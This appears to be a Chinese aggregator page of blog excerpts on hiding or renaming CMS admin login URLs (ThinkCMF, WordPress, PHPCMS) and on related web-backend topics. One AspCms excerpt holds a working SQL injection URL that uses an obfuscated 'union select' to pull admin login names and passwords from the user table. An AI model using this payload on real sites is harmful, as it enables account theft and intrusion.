ThinkCMF后台地址加密忘记了无法打开后台怎么办?笔者为了网站安全把ThinkCMF后台的安全模式打开后忘了保存加密地址,导致无法登陆后台,找了些网上的资料,不太靠谱,只好从代码入手,找到/application/Admin/Controller/PublicController.class.php 将24-33行的: }else{ $site_admin_url_password =C("SP_SITE_ADMIN_URL_PASSWORD"); $upw=session(&qu…

做了一个项目,上线的时候 需要隐藏掉domain.com/admin 这个后台地址,但是用的thinkcmf已经预定义好了admin模块. 我们可以用thinkphp自带的模块映射功能实现, 比方说我想把domain.com/admin 屏蔽掉,用domain.com/dream来替换 具体配置: 1.先在允许访问的模块配置MODULE_ALLOW_LIST 里加入dream模块. 'MODULE_ALLOW_LIST' => array( 'Admin', 'Dream', 'Portal',…

做优化的朋友都知道网站的robots的目的是让搜索引擎知道我们网站哪些目录可以收录,哪些目录禁止收录.通常情况蜘蛛访问网站时,会首先检查你的网站根目录是否有robots文件,如果有,则会根据此文件来进行抓取判断,如果不存在robots,那么网站的所有页面都有可能被收录,这将会给网站带来安全隐患. 例如:通过百度搜索“织梦内容管理系统 V57_UTF8_SP1”就会出现一堆用织梦程序的后台地址,将后台暴露给他人,带来极大的安全隐患. 下面木子网络先给大家介绍下robots.txt是干什么的? ro…

用过WordPress后台的,其实都知道http://域名目录/wp-login.php就是登录地址,如果这时候使用暴力破解,很可能破解密码(这就有些想象力了),下面芝麻带你看看如何自定义美观的地址. 首先,咱要明确 WordPress登陆文件名wp-login.php后缀. 我们一共需要修改2个文件,其中当然包括wp-login.php1.先在网站根目录下把wp-login.php文件改成你想要的名字,例如zhiama.php,然后用编辑器打开这个文件.替换所有wp-login字符为zhima…

wordpress默认的后台地址是 xx/wp-admin  或xx/wp-login.php ,谁都知道感觉很不安全, 方法一:使用插件 通过插件在地址上加上只有你知道的参数才能访问 1.后台搜索插件Stealth Login Page进行安装 2.然后设置自定义登录地址的链接参数, 3.下次登录就要填多个值,如果输入错误就会重定向到http://localhost/w/ 4.不想要的话,把插件删除或停用防护自然消失 方法二:重命名登录页 找到wp-login.php 更改为自定义的文件名,为…

修改PHPCMS v9默认后台登录地址 1.修改admin.php文件名,并修改跳转地址写上完整路径2.修改 /phpcms/modules/admin/classes/index.php,把 public function login 改为自己想要的名.3.修改 /phpcms/modules/admin/classes/admin.class.php final public function check_admin() { if(ROUTE_M =='admin' && ROUTE_…

访问即可跳转后台地址: URL:http://www.xxx.org.cn/plug/oem/AspCms_OEMFun.asp 注入:plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user…

下面是可以将我们的url地址加密.确保我们提交的数据安全 以下是代码片段: <?php function keyED($txt,$encrypt_key) //定义一个keyED { $encrypt_key = md5($encrypt_key); $ctr=0; $tmp = ''; for($i=0;$i<strlen($txt);$i++) { if ($ctr==strlen($encrypt_key)) $ctr=0; $tmp.= substr($txt,$i,1) ^ subs…

后台调用 js 方法 前台调用后台方法与变量:  后台被调用的方法必须是public 或 protected 后台被调用的方法必须是静态的static 方法一:通过WebService来实现 步骤: 后台 Ø  首先引入命名空间(using System.Web.Services;) Ø  然后定义公共的静态的方法(必须为public和static的,且静态方法不能访问外部的非静态变量,此时后台与前台相当于父类与子类的关系),并在该方法头部上加上[System.Web.Services.WebM…

form表单提交,后台怎么获取select的值? 后台直接获取即可,和后台获取input的值方式一样. form提交后,后台直接根据select的name获取即可,即getPara("XXX"),获取的就是被选择的option的值. 执行原理:form提交,浏览器根据"select的名字=被选择的option"这种形式,放入http url的请求报文中(这是浏览器提供的功能,即是浏览器来负责完成的),因此,后台直接获取即可,跟获取input的值的方式一样. 我随便捕…